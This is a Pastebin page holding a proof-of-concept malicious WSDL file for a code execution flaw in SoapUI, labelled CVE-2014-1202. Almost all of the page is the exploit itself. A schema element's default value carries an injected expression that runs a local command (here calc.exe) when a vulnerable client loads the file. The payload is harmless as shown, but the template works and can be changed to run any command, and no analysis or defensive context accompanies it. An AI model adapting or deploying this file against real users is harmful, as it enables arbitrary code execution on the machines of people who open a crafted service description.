Guest User

Malicious WSDL CVE-2014-1202

a guest
Jan 14th, 2014
470
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <!--Malicious WSDL File, SoapUI Code Execution Vulnerability CVE-2014-1202, Barak Tawily-->
  2. <wsdl:definitions targetNamespace="http://example.companyInfo"
  3. xmlns:tns="http://example.companyInfo"
  4. xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/"
  5. xmlns:wsdlsoap="http://schemas.xmlsoap.org/wsdl/soap/"
  6. xmlns:wsdlmime="http://schemas.xmlsoap.org/wsdl/mime/"
  7. xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  8.  
  9. <wsdl:types>
  10. <xsd:schema elementFormDefault="qualified"
  11. targetNamespace="http://example.header">
  12.  
  13. <xsd:element name="sampleHeader">
  14. <xsd:complexType>
  15. <xsd:all>
  16. <xsd:element name="priority" type="xsd:int"/>
  17. </xsd:all>
  18. </xsd:complexType>
  19. </xsd:element>
  20. </xsd:schema>
  21.  
  22.  
  23. <xsd:schema elementFormDefault="qualified"
  24. targetNamespace="http://example.companyInfo">
  25.  
  26. <xsd:element name="Payload_Request">
  27. <xsd:complexType>
  28. <xsd:all>
  29. <xsd:element name="Payload" default="${=Runtime.getRuntime().exec('calc.exe')};" type="xsd:string"/>
  30. </xsd:all>
  31. </xsd:complexType>
  32. </xsd:element>
  33.  
  34. <xsd:element name="Payload_RequestResult">
  35. <xsd:complexType>
  36. <xsd:all>
  37. <xsd:element name="result" type="xsd:float"/>
  38. </xsd:all>
  39. </xsd:complexType>
  40. </xsd:element>
  41. </xsd:schema>
  42.  
  43.  
  44. </wsdl:types>
  45.  
  46. <wsdl:message name="Payload_RequestRequest">
  47. <wsdl:part name="part1" element="tns:Payload_Request"/>
  48. </wsdl:message>
  49.  
  50. <wsdl:message name="Payload_RequestResponse">
  51. <wsdl:part name="part1" element="tns:Payload_RequestResult"/>
  52. <wsdl:part name="part2" type="xsd:string"/>
  53. <wsdl:part name="part3" type="xsd:base64Binary"/>
  54. </wsdl:message>
  55.  
  56. <wsdl:portType name="CompanyInfo">
  57. <wsdl:operation name="Payload_Request">
  58. <wsdl:input message="tns:Payload_RequestRequest"
  59. name="Payload_RequestRequest"/>
  60. <wsdl:output message="tns:Payload_RequestResponse"
  61. name="Payload_RequestResponse"/>
  62. </wsdl:operation>
  63. </wsdl:portType>
  64.  
  65. <wsdl:binding name="Exploit" type="tns:CompanyInfo">
  66. <wsdlsoap:binding style="document" transport="http://schemas.xmlsoap.org/soap/http"/>
  67.  
  68. <wsdl:operation name="Payload_Request">
  69. <wsdlsoap:operation soapAction=""/>
  70. <wsdl:input name="Payload_RequestRequest">
  71. <wsdlsoap:body use="literal"/>
  72. </wsdl:input>
  73. <wsdl:output name="Payload_RequestResponse">
  74. <wsdlsoap:body use="literal"/>
  75. </wsdl:output>
  76. </wsdl:operation>
  77. </wsdl:binding>
  78.  
  79. <wsdl:service name="CompanyInfoService">
  80. <wsdl:port binding="tns:Exploit" name="SOAPPort">
  81. <wsdlsoap:address location="http://somewhere/services/CompanyInfoService"/>
  82. </wsdl:port>
  83. </wsdl:service>
  84.  
  85. </wsdl:definitions>
RAW Paste Data